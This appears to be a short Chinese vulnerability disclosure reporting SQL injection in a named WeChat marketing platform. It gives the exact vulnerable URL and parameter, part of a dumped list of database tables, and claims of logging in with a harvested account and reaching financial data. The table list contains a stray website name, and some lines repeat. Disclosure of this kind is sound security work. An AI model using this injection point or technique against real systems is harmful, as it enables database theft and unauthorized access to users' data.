sql注入漏洞,嗯,因为这个微信营销系统最重要的数据库已经可被拖库,所以自评个高rank
访问链接 http://www.wechatpen.com/api/app/website/list.aspx?wid=332389&acid=10379&menu_id=145128,正常
访问链接
http://www.wechatpen.com/api/app/website/detail.aspx?sn=&wid=332389&acid=%22&menu_id=145128&wxref=mp.weixin.qq.com,有惊喜
爆库:
Database: weixinbao
[233 tables]
+---------------------------------------+
| module |
| account |
| account_copy20131120 |
| account_copy20140126 |
| accountdetail |
| admin_nums |
| agent_level |
| www.myhack58.com |
| app_advs |
| app_attributes |
| app_attributevalues |
| app_brand |
| app_coupon |
| app_coupon_avis |
| app_coupon_result |
| app_coupon_sn |
| app_crm_datereport |
| app_crm_user |
| app_crm_usertarget |
| app_crm_weixin_account |
| app_custom |
| app_eventclick_config |
| app_eventclick_menu_config |
| app_fodder |
| app_food_choicefoodinfo |
| app_food_choicefoodlist |
| app_food_dinnertable |
| app_food_foodgroup |
| app_food_foodset |
。。。
有200多个呢,不一一贴了
拿其中一个账号登陆下看看。
同样也有财务,报表等数据,也可越权登陆功能。
拿其中一个账号登陆下看看。
同样也有财务,报表等数据,也可越权登陆功能。
怎样堵住漏洞你们应该比我更懂!